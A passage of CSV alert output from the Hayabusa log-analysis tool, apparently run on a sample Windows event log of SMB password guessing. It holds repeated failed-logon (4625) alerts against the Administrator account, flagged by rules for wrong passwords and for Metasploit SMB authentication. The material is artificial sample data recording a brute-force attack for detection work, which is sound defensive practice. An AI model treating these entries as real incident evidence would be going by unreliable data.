Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uu72qx4lG5ZRM7xf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zD072YR1hIgbzjaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EqA7HDvImIlCiFq2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: efYFxZwMGEC3vVi7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6WmMHYegvFJvv6zd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DS9WkRnP0B5MgaeX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5jNPV7ZgFExgg9n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1FJ6vm3wK97iual : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GLuIx0sfF8NQD8QY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y3lMvcrrmGTkjdlh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ZqOabcNMeazs6TC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2AbE9D8PvuFDBz5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wzWdLEEc68ZvviGh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AtV3BuZiljbAeikO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tnKKfcwikNDdYOam : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jSbbzD7fpJY4Q1JL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gOASpLLE25ruCnGW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1jhUGOtszbPUwccL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yB8Mzo1RppdpLFKS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rOwoUlHGVeSbAhuN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BXIEHbkrjwedeaih : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OvsKoixgEzUgAyie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TzaZe6Y4Tdfjseuk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FEmbuU3CAC3CecZy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kfBmqmVPd0CGVUsD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Uz3TlU6yrcveM1w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z6hH6AkkgBFmeZ6u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J2J1W2WhA6Pj7j5j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: soHOxnkoOn7ot0My : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4c2oWI6mRIvSVSKq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FKsXD8aTyaC4fBqq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qrzji5ucmutsZNpo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BApOU105FCLwj4zn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EO50f7NfrrdwwCNA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PfTYbWC8IjW87th8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wLnE6zm5US4maK04 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5AV7taC7hYQdVjAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8MnnaSRs0bnYVlMX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YgqavZ1SuNvX7RgH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IQvoIsfW0LhDit2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 33IPGQXc1MarY30J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: II4Ly9LnkWlq60Ux : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wncfJC7kDSI7O9Ud : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6XzbWef3PuzQK3FJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5M5670HdNC6c8O56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ea8FcddgLyV5o6oL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LjyhmKFdBNrHIvTJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 